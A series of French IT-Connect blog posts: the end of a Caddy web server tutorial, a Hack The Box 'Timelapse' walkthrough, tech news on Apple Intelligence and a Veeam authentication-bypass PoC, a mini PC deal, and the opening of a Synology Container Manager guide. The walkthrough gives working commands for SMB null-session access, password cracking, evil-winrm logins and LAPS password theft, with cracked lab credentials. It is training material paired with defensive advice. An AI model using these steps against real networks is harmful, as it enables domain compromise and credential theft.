• roll_keep : nombre de fichiers de logs à conserver sur le serveur.
• roll_keep_for : durée de conservation des fichiers de logs (en heures).

Il est à noter que par défaut, les logs sont au format JSON. Ceci n'est pas habituel, mais rend les logs facilement "parsables".

C. Ajouter PHP-FPM à Caddy

Lors de la mise en place d'un serveur web, il est très fréquent d'ajouter un moteur PHP. Caddy prend en charge PHP, et nous allons pouvoir installer PHP-FPM comme nous l'avions fait avec Apache2 (Tutoriel : Apache2 et PHP-FPM).

Nous devons installer le paquet PHP-FPM, dans la version de notre choixi. Ici, pour PHP 8.2.

sudo apt-get install php8.2-fpm

Puis, nous devons éditer le fichier "Caddyfile" pour que Caddy s'appuie sur PHP-FPM pour exécuter les scripts PHP. Voici la ligne à ajouter :

webcad.it-connect.tech {
        # Racine du site web
        root * /var/www/webcad

        # Activer la distribution de fichiers statiques
        file_server

        # Activer la compression Zstandard et Gzip
        encode zstd gzip

        # Utiliser PHP-FPM
        php_fastcgi unix//run/php/php-fpm.sock

        # Logging
        log {
                output file /var/log/caddy/access.log {
                        roll_size 1gb
                        roll_keep 5
                        roll_keep_for 720h
                }
        }

}

Enregistrez le fichier et redémarrez Caddy. Pour vérifier la configuration, nous pouvons créer la page PHP de notre choix. Par exemple, nous pouvons - temporairement - créer une page "/var/www/webcad/caddyphp.php" pour afficher les informations sur la configuration de PHP active sur notre serveur.

<?php

phpinfo();

?>

Puis, nous pouvons accéder à cette page :

PHP est bien intégré à Caddy sinon la page ne s'afficherait pas correctement. Il ne reste plus qu'à personnaliser la configuration et à installer les modules PHP nécessaires en fonction du projet que vous cherchez à déployer.

Remarque : Caddy est le serveur Web utilisé par FrankenPHP, une implémentation du PHP.

D. Activer l'Explorateur de fichiers de Caddy

Pour finir, nous allons aborder une fonctionnalité de Caddy plutôt original : l'explorateur de fichiers intégré. En effet, il s'agit d'un explorateur de fichiers moderne bien loin de ce qui est proposé par Apache2.

Pour l'activer, la directive "file_server" doit être configurée en mode "browse" dans le fichier Caddyfile. Nous devons aussi ajouter la directive "hide" pour masquer certains fichiers : il ne faudrait pas que l'explorateur de fichiers permettent de lire le contenu éventuel d'un fichier PHP !

        # Enable the static file server.
        file_server browse {
                hide *.php
        }

Une fois que c'est fait, il suffit de redémarrer Caddy et d'accéder à notre serveur Web. Dans le cas présent, j'ai déposé des fichiers textes et une image dans le répertoire "/docs/" du site web. Voici ce que ça donne :

Nous pouvons prévisualiser les images (de quoi créer facilement une galerie) et le fait de cliquer sur un fichier texte l'ouvre dans un nouvel onglet. Une fonctionnalité à utiliser avec parcimonie et à bien configurer, car elle peut exposer des données sensibles (un fichier de configuration, par exemple).

IV. Conclusion

Ce tutoriel d'introduction à Caddy touche à sa fin ! Nous avons vu comment effectuer l'installation de ce serveur web sur Debian 12, puis nous avons mis en place notre première configuration. La gestion automatique du HTTPS est un gros plus pour Caddy, ce qui évite de gérer Let's Encrypt soi-même que ce soit avec ACME ou Certbot.

Habitué à configurer Apache2 depuis de nombreuses années, et de temps à autre Nginx et IIS, j'avoue que j'étais un peu perdu au moment de faire mes premiers pas avec Caddy. Comme pour tout service, il faut du temps pour comprendre son fonctionnement : la documentation est une aide précieuse. La communauté ne semble pas encore très importante, contrairement à Apache2 ou Nginx où l'on trouve de nombreux articles, posts sur les forums, etc... Ceci devrait s'améliorer avec le temps : Caddy est un projet mature et très intéressant qui mérite qu'on s'intéresse à lui.

N'hésitez pas à commenter cet article pour poser vos questions et partager votre avis sur Caddy.

The post Serveur web : installation et configuration de Caddy sur Debian 12 first appeared on IT-Connect.

I. Présentation

Dans cet article, je vous propose la résolution de la machine Hack The Box Timelapse, de difficulté "Facile". Cet exercice vous montrera un exemple très concret et plutôt réaliste de compromission d'un Active Directory et donc d'un domaine dans un réseau d'entreprise.

Hack The Box est une plateforme en ligne qui met à disposition des systèmes vulnérables appelées "box". Chaque système est différent et doit être attaqué en adoptant la démarche d'un cyberattaquant. L'objectif est d'y découvrir les vulnérabilités qui nous permettront de compromettre les utilisateurs du système, puis le compte root ou administrateur.

Ces exercices permettent de s’entraîner légalement sur des environnements technologiques divers (Linux, Windows, Active directory, web, etc.), peuvent être utiles pour tous ceux qui travaillent dans la cybersécurité (attaquants comme défenseurs) et sont très formateurs.

Je vais ici vous détailler la marche à suivre pour arriver au bout de cette box en vous donnant autant de conseils et ressources que possible. N'hésitez pas à consulter les nombreux liens qui sont présents dans l'article.

Cette solution est publiée en accord avec les règles d'HackThebox et ne sera diffusée que lorsque la box en question sera indiquée comme "Retired".

Technologies abordées	Windows, Powershell, LAPS
Outils utilisés	nmap, smbclient, johntheripper, evil-winrm, openssl, PowerShell

Retrouvez tous nos articles Hack The Box via ce lien :

• IT-Connect - Articles Hack The Box

II. Résolution de la box Timelapse

A. Découverte et énumération

Pour l'instant, nous ne disposons que de l'adresse IP de notre cible. Commençons par un scan réseau à l'aide de l'outil nmap pour découvrir les services exposés sur le réseau, et pourquoi pas leurs versions.

Technique d'attaque (MITRE ATT&CK) : T1046 - Network Service Discovery

$ nmap 10.10.11.152 -p- -T5 -Pn
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans

De nombreux services sont exposés et nous pouvons directement distinguer des services propres aux systèmes d'exploitations Windows et même à l'Active Directory (TCP/88).

Retrouvez notre cours complet sur Nmap sur lien suivant :

• IT-Connect - Maîtrisez Nmap pour la cartographie réseau et le scan de vulnérabilités

B. Recherche dans un partage de fichiers

Une première opération à réaliser systématiquement est de vérifier que tous les partages sont bien protégés par une authentification, exemple avec le port TCP/445 (SMB) et l'outil "smbmap" :

Technique d'attaque (MITRE ATT&CK) : T1078.001 - Valid Accounts: Default Accounts

$ smbmap -u "%" -p "" -P 445 -H 10.10.11.152 --no-banner

Voici le retour que l'on peut observer :

Le service SMB accepte les null sessions, on peut donc s'y authentifier et parcourir certains partages de fichier sans connaitre d'identifiants valides. Une rapide découverte des fichiers stockés nous permet de découvrir une archive ".zip" :

Technique d'attaque (MITRE ATT&CK) : T1083 - File and Directory Discovery

Celle-ci est protégée par un mot de passe, nous pouvons utiliser l'outil "zip2john" afin d'extraire le hash de ce mot de passe dans un format que l'outil de cassage "John The Ripper" saura interpréter. Nous pourrons ensuite utiliser cet outil pour tenter de retrouver le mot de passe correspondant à ce hash à l'aide d'une attaque par brute force reposant sur le dictionnaire "rockyou.txt" :

Technique d'attaque (MITRE ATT&CK) : T1110.002 - Brute Force: Password Cracking

$ zip2john winrm_backup.zip > /tmp/zipPasswordHash
$ john /tmp/zipPasswordHash --wordlist=rockyou.txt
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)

L'utilisation d'un mot de passe faible nous permet d'ouvrir l'archive pour en extraire un fichier ".pfx", dont l'accès est également protégé par un mot de passe. Nous pouvons réitérer la même opération sur ce format de fichier (avec "pfx2john") :

$ pfx2john legacyy_dev_auth.pfx > /tmp/pfxPasswordHash
$ john /tmp/pfxPasswordHash --wordlist=rockyou.txt
thuglegacy       (legacyy_dev_auth.pfx) 

Comme vous pouvez le remarquer, l'outil "John The Ripper" va détecter lui-même le format du hash et adapter son cassage de mot de passe en conséquence. Le nom du fichier semble nous indiquer qu'il appartient à l'utilisateur "legacyy".

Maintenant que nous connaissons le mot de passe du fichier ".pfx", qui est un certificat privé, nous pouvons extraire la clé privée et le certificat qu'il contient :

$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes 
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem

C. Accès winRM et historique PowerShell

Une clé privée est avant tout utilisée pour prouver une identité, c'est-à-dire s'authentifier. Nous pouvons tenter d'utiliser ces informations afin de nous authentifier sur les services exposés de notre cible qui accepte ce mode d'authentification. J'utilise ici l'outil "evil-winrm" afin de m'authentifier sur le service WinRM (TCP/5985) en utilisant la clé privée et le certificat précédemment découvert :

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

evil-winrm  --user Legacy -k priv-key.pem -i timelapse.htb -p thuglegacy -S -c certificate.pem
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
a9a2[REDACTED]d351f

Une fois qu'un accès interactif distant est obtenu sur une cible, l'attaquant peut mener de nombreuses opérations pour comprendre où il est sur le réseau, sur le système, quels sont ses droits locaux, à quoi sert le système compromis, etc. Parmi ces opérations figure la vérification de l'historique utilisateur, stocké dans un fichier dans le répertoire de chaque utilisateur dans le cas de PowerShell :

Technique d'attaque (MITRE ATT&CK) : T1083 - File and Directory Discovery

Evil-WinRM* PS C:\Users\legacyy> cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

Dans notre cas, l'historique de commande PowerShell nous permet de retrouver un mot de passe en clair saisi lors de sa conversion en objet "SecureString". Nous pouvons également facilement savoir à quel utilisateur il appartient : "svc_deploy". Ce compte peut ensuite être utilisé pour accéder à distance au système à l'aide de la commande "evil-winrm" :

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

$ evil-winrm --user svc_deploy -i timelapse.htb -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

D. Élévation de privilège via LAPS_READERS

Nouveau compte, nouvelle énumération. Il nous faut à présent connaitre les droits supplémentaires de ce compte par rapport au compte précédent afin de savoir si celui-ci nous permettra d'aller encore plus loin sur le système. Je liste, par exemple, l'ensemble de mes droits et permissions sur le système d'exploitation via avec la commande ""whoami /all"" :

Technique d'attaque (MITRE ATT&CK) : T1069.002 - Permission Groups Discovery: Domain Groups

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
User Name            SID
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103

GROUP INFORMATION
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group

Cet utilisateur "svc_deploy" fait partie du groupe "TIMELAPSE/LAPS_READERS", il s'agit d'un groupe important qui permet de gérer, et donc lire, les mots de passe LAPS des systèmes du domaine.

Pour en apprendre plus sur ce qu'est LAPS et surtout son apport en termes de sécurité, n'hésitez pas à consulter nos tutoriels à ce sujet :

• Active Directory - Comment configurer Windows LAPS ?
• Intune - Comment configurer Windows LAPS ?

Ce droit très sensible me permet notamment de récupérer le mot de passe de l'administrateur du contrôleur du domaine, opération ici réalisée en PowerShell :

Technique d'attaque (MITRE ATT&CK) : T1555 - Credentials from Password Stores

> Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : (z)e;CScAMkY1{C-h{vq8oSb
Name                        : DC01

Avec cette information, nous obtenons les droits de l'utilisateur local "Administrator". Autrement dit, nous avons compromis le contrôleur de domaine, et par extension le domaine lui-même.

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

*Evil-WinRM* PS C:\Users\Administrator> whoami
timelapse\administrator
*Evil-WinRM* PS C:\Users\TRX> cat Desktop/root.txt
74d6f[REDACTED]9c2d6

III. Résumé de l'attaque

Voici une description de l'attaque réalisée en utilisant les TTP (Tactics, Techniques and Procedures) du framework MITRE ATT&CK :

TTP (MITRE ATT&CK)	Détails
T1046 - Network Service Discovery	Scan réseau réalisé via nmap pour découvrir les services exposés
T1078.001 - Valid Accounts: Default Accounts	Découverte et utilisation d'un null session sur le service SMB
T1083 - File and Directory Discovery	Recherche de fichiers sensibles dans le partage de fichier via smbmap. Téléchargement d'une archive ZIP
T1110.002 - Brute Force: Password Cracking	Attaque par bruteforce sur un ".zip" chiffré, puis un fichier ".pfx"
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec le compte "legacyy" et l'outil "evil-winrm".
T1083 - File and Directory Discovery	Recherche de fichiers sensibles sur le système avec les droits de l'utilisateur "legacyy". Découverte d'un mot de passe dans l'historique PowerShell.
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec le compte "svc-deploy" et l'outil "evil-winrm".
T1069.002 - Permission Groups Discovery: Domain Groups	Découverte des groupes dont est membre "svc-deploy" via PowerShell.
T1555 - Credentials from Password Stores	Récupération du mot de passe de l'administrateur local du contrôleur de domaine via PowerShell
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec les identifiants de l'administrateur local.

IV. Notions abordées

A. Côté attaquant

Le chemin d'attaque de cette box propose la découverte et l'exploitation de vulnérabilité assez classiques et réalistes, notamment concernant l'identification des partages réseau. Il est très fréquent de trouver des partages réseau sur les hôtes d'un système d'information dont certains sont très mal protégés. Cela parfois à cause du "shadow IT", des services montés dans le dos de l'équipe informatique, ou par simple négligence sur un périmètre trop important et difficile à maitriser.

À ce titre, la découverte des partages de fichiers et la recherche d'information sensible aurait également pu être réalisée via Snaffler, qui nous aurait sorti le même résultat.

Pour en apprendre plus sur cet outil puissant, voici notre article sur le sujet :

• IT-Connect - Analysez vos partages de fichiers Active Directory avec Snaffler pour protéger vos données

B. Côté défenseur

Pour sécuriser ce système, nous pouvons proposer plusieurs recommandations :

Recommandation n°1 : Nous pouvons ici recommander dans un premier temps de renforcer la politique de mots de passe sur le service SMB notamment en interdisant les null sessions. Le mot de passe utilisé pour protéger l'archive ".zip" et le ".pfx" sont faibles puisqu'ils ont été cassés à l'aide du dictionnaire très classique rockyou.txt. Nous pouvons citer en ressource externe le guide de l'ANSSI sur les mots de passe : Recommandations relatives à l'authentification multifacteur et aux mots de passe.

• IT-Connect - Politique de mot de passe : comment appliquer les bonnes pratiques de l’ANSSI ?
• IT-Connect - Pourquoi faut-il préférer les passphrases aux mots de passe ?

Recommandation n°2 : par extension, il peut être recommandé de vérifier la présence de fichiers sensibles dans les partages réseau, cela pour éviter qu'un utilisateur ou attaquant ne tombe sur des fichiers qu'il n'est pas censé trouver.

Recommandation n°3 : enfin, il peut être recommandé de sensibiliser l'équipe technique à la manipulation des mots de passe, surtout pour éviter qu'ils se retrouvent stockés dans l'historique PowerShell ou ailleurs.

L'élévation de privilège réalisé ici n'a rien d'anormal une fois que l'on a compromis le compte "svc-deploy". On peut s'interroger sur la légitimité de l'appartenance au groupe "LAPS_READERS" mais cela dépends essentiellement du contexte métier et organisationnel. Une fois ce compte compromis, on ne fait finalement qu'une opération légitime : récupérer un attribut auquel les membres de groupe ont accès. Le compte "svc-deploy" a d'ailleurs un mot de passe plutôt correct.

J’espère que cet article vous a plu ! N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord!

Enfin, si vous voulez accéder à des cours et modules dédiés aux techniques offensives ou défensives et améliorer vos compétences en cybersécurité, je vous oriente vers Hack The Box Academy, utilisez ce lien d'inscription (je gagnerai quelques points ) : Tester Hack the Box Academy

The post Compromission Active Directory – Le cas de la Box Timelapse de Hack The Box first appeared on IT-Connect.

Apple Intelligence, c'est le nom de l'intelligence artificielle d'Apple dédiée à tout l'écosystème de la marque ! C'est désormais officiel, Apple lance son IA et va tenter de rattraper son retard sur la concurrence. Faisons le point sur cette annonce.

À l'occasion de sa keynote WWDC24, Apple a dévoilé plusieurs nouveautés et fait plusieurs annonces importantes, dont le système d'exploitation iOS 18, la mise en vente de son casque Apple Vision Pro en France à partir du 12 juillet 2024, mais aussi et surtout Apple Intelligence, l'IA d'Apple.

Apple établit un partenariat avec OpenAI pour son IA

Derrière le nom "Apple Intelligence" se cache un partenariat entre Apple et OpenAI, l'entreprise à l'origine de ChatGPT. Ainsi, le modèle de langage d'OpenAI va être intégré à Siri, qui devrait être beaucoup plus pertinent et puissant, ainsi qu'aux autres applications. Au même titre que ChatGPT, Siri va pouvoir s'appuyer sur le modèle de langage le plus récent d'OpenAI : GPT-4o.

Si l'assistant vocal juge qu'il peut obtenir une réponse plus précise en sollicitant ChatGPT, alors il va vous demander la permission avant de procéder à l'interrogation de l'IA. "Siri peut se servir des connaissances de ChatGPT lorsque c’est utile.", précise Apple.

L'arrivée de l'IA va permettre aux utilisateurs d'appareils Apple de bénéficier de fonctions de réécriture de texte (reformuler un e-mail, par exemple), de synthèse de documents, et elle pourra aussi créer des diaporamas personnalisés ainsi que des images. Ces fonctions seront intégrées directement à l'interface des OS d'Apple.

Apple Intelligence sera mis à disposition gratuitement des utilisateurs d'iOS 18, d'iPadOS 18 et de macOS Sequoia. Autrement dit, ce sera gratuit sur les versions les plus récentes des systèmes Apple, qui viennent d'être présentées. En complément, Apple devrait aussi proposer des abonnements payants pour rendre accessible l'IA à un maximum d'utilisateurs, à condition de passer à la caisse. De plus, les abonnés à ChatGPT Plus pourront se connecter à leur compte directement à partir de leur appareil Apple.

La confidentialité des données avec l'IA Apple Intelligence

Dans son communiqué de presse, Apple évoque aussi la confidentialité de cette IA. Comme à son habitude, la firme de Cupertino cherche à garder la maitrise de son environnement, donc ses propres serveurs avec des puces Apple seront utilisés pour les traitements dans le Cloud : "Grâce à Private Cloud Compute, Apple établit une nouvelle norme de confidentialité dans l’IA, avec la possibilité d’adapter et de faire évoluer la capacité de calcul entre le traitement sur l’appareil et les modèles plus larges qui s’exécutent sur des serveurs dédiés alimentés par des puces Apple."

Apple explique également que de nombreuses demandes pourront être traitées en local, sur l'appareil en lui-même. Il n'y a que pour les tâches complexes nécessitant plus de puissance de traitement qu'Apple Intelligence sollicitera le Private Cloud Compute d'Apple. "Ces modèles fonctionnent sur des serveurs alimentés par les puces Apple, fournissant une base qui permet à Apple de s'assurer que les données ne sont jamais conservées ou exposées.", peut-on lire.

Avec son IA, Apple mise sur la sécurité des échanges et des données afin de protéger ses utilisateurs, mais aussi les rassurer. D'ailleurs, la firme de Cupertino précise vouloir proposer une IA en laquelle les utilisateurs peuvent avoir confiance.

Quand sera disponible Apple Intelligence ?

Une première version de l'IA Apple Intelligence sera disponible aux États-Unis durant l'été 2024. Néanmoins, elle ne sera pas disponible en France aussi rapidement et il faudra attendre encore plusieurs mois avant de pouvoir en profiter. Par ailleurs, ceci est conditionné à l'utilisation d'iOS 18, d'iPadOS 18 et de macOS Sequoia.

Qu'en pensez-vous ?

Source

The post Apple lance son IA baptisée « Apple Intelligence », en partenariat avec OpenAI first appeared on IT-Connect.

À l'occasion de son 21ème anniversaire, Geekom propose une réduction de 50 euros sur son mini PC Geekom Air 12 ! Voici ce qu'il faut savoir sur cette offre et ce modèle à moins de 250 euros !

Chez Geekom, la série de mini PC "Air" correspond à des modèles avec un processeur Intel conçu pour faire tourner les applications du quotidien, en particulier pour la bureautique, tout en proposant un très bon rapport qualité/prix.

50 euros de remise sur le Geekom Air 12

Avec le code "it50air12" obtenez 50 euros de réduction immédiate sur le mini PC Geekom Air 12 en passant par le site officiel de Geekom ! Son prix passe de 299,00 euros à 249,00 euros !

Il est expédié directement depuis l'Europe (Allemagne) et la livraison est effectuée en quelques jours. Pour bénéficier de cette offre, vous pouvez utiliser notre lien d'affilié Geekom : cliquez ici pour en savoir plus et accéder à l'offre.

Les caractéristiques du modèle Geekom Air 12

Le Geekom Mini Air 12 embarque un processeur Intel Alder Lake N100 (12 ème génération - 4 coeurs - 4 threads), de 16 Go de RAM (DDR5) et 512 Go de stockage SSD (M.2 2280 - Gen3x4). La RAM ne peut pas être augmentée, car il s'agit de la capacité maximale supportée par ce CPU.

Parlons de la connectique en commençant par la connectivité sans-fil. Ce mini PC est équipé du Wi-Fi 6 et du Bluetooth 5.2. De plus, il intègre un total de 5 ports USB dont 2 ports USB-C ainsi qu'une interface réseau 1 GbE, un port HDMI 2.0 et un port mini DisplayPort 1.4. Au total, ce modèle peut gérer jusqu'à 3 écrans. Grâce à son support VESA, ce boitier peut être accroché à l'arrière d'un écran ou sur un support compatible.

Le Geekom Air 12 est livré avec le système d'exploitation Windows 11 Pro, que vous pouvez remplacer bien entendu. Une belle configuration pour moins de 250 euros !

Voici un aperçu complet de sa connectique :

Vous recherchez un modèle plus puissant ? Regardez nos tests de mini PC Geekom :

• Test Geekom XT12 Pro
• Test Geekom IT13

The post Bon plan – Le mini PC Geekom Air 12 à moins de 250 euros ! first appeared on IT-Connect.

Vous utilisez Veeam Backup & Replication ainsi que Veeam Backup Enterprise Manager ? Sachez qu'un exploit PoC a été publié pour une faille de sécurité critique permettant à un attaquant d'outrepasser l'authentification. Faisons le point.

Pour rappel : Veeam Backup Enterprise Manager est une console Web de gestion et reporting pour la célèbre solution Veeam Backup & Replication. Elle offre l'avantage de permettre de gérer plusieurs instances Veeam à partir d'une console unique. Il est important de préciser qu'elle n'est pas activée par défaut, donc toutes les organisations ne sont pas exposées à ce risque de sécurité.

La faille de sécurité CVE-2024-29849 présente dans Veeam Backup Enterprise Manager a déjà été corrigée par Veeam puisqu'un bulletin de sécurité a été publié à son sujet le 21 mai 2024. Nous avions repris cette alerte de sécurité dans l'un de nos précédents articles pour vous avertir. Si vous n'avez pas encore fait le nécessaire pour vous protéger, il va être temps de passer à l'action : un exploit PoC a été publié pour cette vulnérabilité.

Un exploit PoC pour la CVE-2024-29849

Le chercheur en sécurité Sina Kheirkhah a mis en ligne un rapport technique au sujet de la faille de sécurité CVE-2024-29849. Ce rapport est accompagné par un exploit PoC publié sur son GitHub, et qui prend la forme d'un script Python.

Dans son rapport, il explique que la faille de sécurité se situe dans "Veeam.Backup.Enterprise.RestAPIService.exe" qui est en écoute sur le serveur, sur le port TCP 9398. D'un point de vue de l'application web principale, il agit comme un serveur API REST. L'exploitation consiste à envoyer un jeton de signature VMware (SSO) spécialement conçu au service vulnérable, en utilisant l'API de Veeam. Finalement, l'attaquant peut usurper l'identité d'un compte administrateur et accéder à l'application sans avoir besoin de s'authentifier.

Le rapport de Sina Kheirkhah est très détaillé et contient toutes les informations techniques nécessaires à la compréhension et l'exploitation de cette vulnérabilité.

Comment se protéger ?

La meilleure façon de se protéger, c'est d'installer le correctif de sécurité publié par Veeam. Le 21 mai 2024, l'éditeur américain a publié la version 12.1.2.172 pour corriger plusieurs vulnérabilités, dont celle-ci.

De plus, il semble judicieux de limiter à certaines adresses IP les accès à l'application sur le port TCP 9398, mais aussi d'activer le MFA sur l'ensemble des comptes de l'application. Enfin, si vous n'utilisez pas Veeam Backup Enterprise Manager, vous pouvez le désinstaller comme l'explique cette page de la documentation Veeam.

Source

The post Veeam Backup Enterprise Manager : un exploit PoC a été publié pour une faille de sécurité critique ! first appeared on IT-Connect.

I. Présentation

Vous souhaitez apprendre à utiliser l'application "Container Manager" disponible sur les NAS Synology ? Vous êtes au bon endroit, car dans ce tutoriel, nous allons effectuer un tour d'horizon de cette application permettant d'exécuter des containers Docker !

• Cliquez ici pour regarder la vidéo sur YouTube

• Comment sécuriser un NAS Synology ?

II. Synology : qu'est-ce que Container Manager ?

Le centre des paquets du système d'exploitation DSM contient une application nommée "Container Manager". Depuis environ un an et suite à la mise en ligne de DSM 7.2, il s'agit du nouveau de l'application "Docker". Son objectif est de vous permettre de créer et d'exécuter des containers Docker sur votre NAS Synology, ce qui ouvre de nombreuses possibilités, tout en consommant peu de ressources.

Vous pouvez créer vos propres containers à partir du référentiel d'images Docker où il y a des milliers d'images différentes. Ainsi, vous pouvez exécuter sur votre NAS diverses applications, au sein de containers isolés du système DSM. D'ailleurs, nous avions déjà mis en ligne des tutoriels pour déployer certaines applications :

• Déployer Vaultwarden sur un NAS Synology
• Déployer FreshRSS sur un NAS Synology
• Déployer Stirling PDF sur un NAS Synology
• Déployer Homer sur un NAS Synology
• Déployer iVentoy (PXE) sur un NAS Synology

Avant de commencer, vérifiez si votre modèle de NAS Synology est compatible avec le paquet "Container Manager" en consultant cette page :

• Synology - Paquet Container Manager

III. Tour d'horizon de l'interface Container Manager

A. Installation de Container Manager

La première étape consiste à installer le paquet "Container Manager" car il n'est pas préinstallé sur DSM. Vous pourrez le trouver dans le "Centre de paquets".

Il suffit de cliquer sur "Tous les paquets", de rechercher le terme "container" pour localiser l'application "Container Manager", puis de cliquer sur le bouton "Installer".

Ensuite, l'application "Container Manager" sera accessible dans le menu principal de DSM.

B. Découverte de l'interface

L'interface de "Container Manager" contient un ensemble de sections accessibles dans un menu vertical présent sur la gauche. Lorsque l'application est lancée, nous arrivons dans la "Vue d'ensemble", qui est un tableau de bord proposant un aperçu global sur l'état de vos containers et les ressources consommées.

Pour le reste, voici à quoi correspondent les autres entrées présentes dans le menu latéral :

• Projet

La section "Projet" est directement liée à l'utilisation de Docker Compose. Cet outil va faciliter le déploiement d'un nouveau conteneur grâce à un fichier de configuration au format YAML.

Autrement dit, vous importez le fichier "docker-compose.yml" dans Container Manager et vous validez pour lancer le téléchargement de l'image du conteneur, ainsi que la création et la configuration du conteneur en lui-même. Ceci vous évite de créer le conteneur pas-à-pas en suivant l'assistant de Synology. Désormais, j'ai pris l'habitude d'utiliser cette méthode pour déployer une nouvelle application conteneurisée sur un NAS Synology.

Il est important de préciser que cela améliore la gestion et la portabilité des conteneurs Docker. En effet, ce fichier de configuration contient toutes les informations relatives à l'exécution de ce conteneur : version de Docker nécessaire, image, mode du réseau, stockage, etc. De plus, un projet peut correspondre à une application multi-conteneurs.

• Conteneur

La section "Conteneur" contient la liste de tous les conteneurs présents sur votre NAS Synology, ainsi que leur statut. C'est également ici que vous pouvez créer un nouveau conteneur à l'aide de l'assistant graphique de DSM, obtenir des détails sur un conteneur, modifier sa configuration, etc....

En passant par la section "Conteneur", vous effectuez la création manuelle d'un conteneur en faisant abstraction sur le fait de pouvoir utiliser Docker Compose (via la section "Projet"). Avant que l'application Docker devienne Container Manager, c'était la seule option.

• Image

La section "Image" contient la liste de toutes les images Docker présentes sur votre NAS Synology. À chaque fois, plusieurs informations sont indiquées : nom de l'image, la version, la taille de l'image et l'heure de création de l'image Docker (ce qui ne correspond pas à la date et l'heure à laquelle vous avez effectué le téléchargement).

La première colonne indique le statut : quand c'est bleu, c'est que l'image est utilisée, c'est-à-dire associée à un conteneur, alors que quand c'est blanc, elle n'est pas utilisée.

• Registre

La section "Registre" donne accès à la liste des images que vous pouvez télécharger sur votre NAS et exploiter ensuite dans des conteneurs Docker. Par défaut, Container Manager s'appuie sur le dépôt officiel "Docker Hub", mais en cliquant sur le bouton "Paramètres", vous pouvez ajouter des dépôts privés. Le nombre d'étoiles indique la popularité de l'image, c'est donc un indicateur important.

• Réseau

La section "Réseau", comme son nom l'indique, donne accès à la gestion du réseau pour les conteneurs. Par défaut, Docker sur Synology est accompagné par deux réseaux : "host" et "bridge", mais il est possible d'en créer d'autres.

En mode "bridge", les conteneurs peuvent communiquer avec le réseau local sur lequel est connecté le NAS tout en étant isolé. Tous les conteneurs connectés à un même réseau bridge peuvent également communiquer entre eux. Docker s'occupe de faire le pont entre le réseau du conteneur et le réseau local. Il s'agit du type de réseau par défaut.

Un conteneur connecté en mode "host" partage directement le réseau de l'hôte Docker, c'est-à-dire du NAS. Le conteneur utilise l'adresse IP de l'hôte directement. Il n'y a pas un réseau virtuel permettant d'interconnecter plusieurs conteneurs comme avec le mode "bridge". En complément, nous avons le pilote "macvlan" qui permet au conteneur d'avoir son adresse MAC ainsi que son adresse IP, et ainsi d'être visible sur le réseau local comme un hôte à part entière (cette configuration est utile dans certains cas, notamment si le conteneur hébergeur un serveur PXE).

• Journal

La section "Journal" contient l'historique des actions effectuées via l'interface de "Container Manager" : téléchargement d'une image, création d'un conteneur, création d'un projet, démarrage ou arrêt d'un conteneur, etc... Il est possible de filtrer le journal par sévérité (Infos, avertissements, erreurs).

IV. La gestion des données des conteneurs Docker

Chaque conteneur déployé a besoin de pouvoir stocker ses données. Je vous recommande de créer un sous-dossier par conteneur dans le répertoire "docker" créé par Container Manager. Par exemple, si vous souhaitez déployer "Homer" dans un conteneur, vous créez un répertoire "homer" sous "docker" et dans la configuration du conteneur Homer, il faudra pointer vers ce répertoire.

Voici un exemple :

Ceci vous permettra d'organiser données associées à vos conteneurs Docker déployés sur votre NAS Synology. Dans le répertoire du conteneur, il pourra y avoir d'autres dossiers (data, config, etc...) en fonction des besoins du conteneur en lui-même.

V. Créer un utilisateur dédié pour exécuter les conteneurs Docker

Lors de la configuration d'un conteneur Docker, notamment à partir d'une configuration Docker Compose, il est très fréquent de devoir préciser avec quel utilisateur nous souhaitons exécuter le conteneur.

Pour des raisons de sécurité, évitez d'exécuter le conteneur avec un compte utilisateur qui est administrateur du NAS. À la place, utilisez un compte utilisateur dédié pour Docker, par exemple, nommé "docker" et qui aura des permissions de lecture et écriture sur le répertoire "docker" et son contenu. C'est tout. Il n'aura pas accès aux autres applications, ni même à l'interface de DSM.

Remarque 1 : dans cet exemple, le compte "docker" sera membre du groupe "users" présent par défaut et nous lui refuserons l'accès à toutes les applications de façon explicite. Vous pouvez aussi créer un groupe "docker" et configurer les permissions sur le groupe, puis ajouter l'utilisateur "docker" uniquement à ce groupe à la place de "users".

Remarque 2 : toutes les images et les scénarios ne permettant pas de spécifier l'utilisateur avec lequel vous souhaitez exécuter le conteneur. En effet, cela dépend des privilèges requis par le conteneur.

Pour créer ce nouveau compte utilisateur, suivez la procédure suivante :

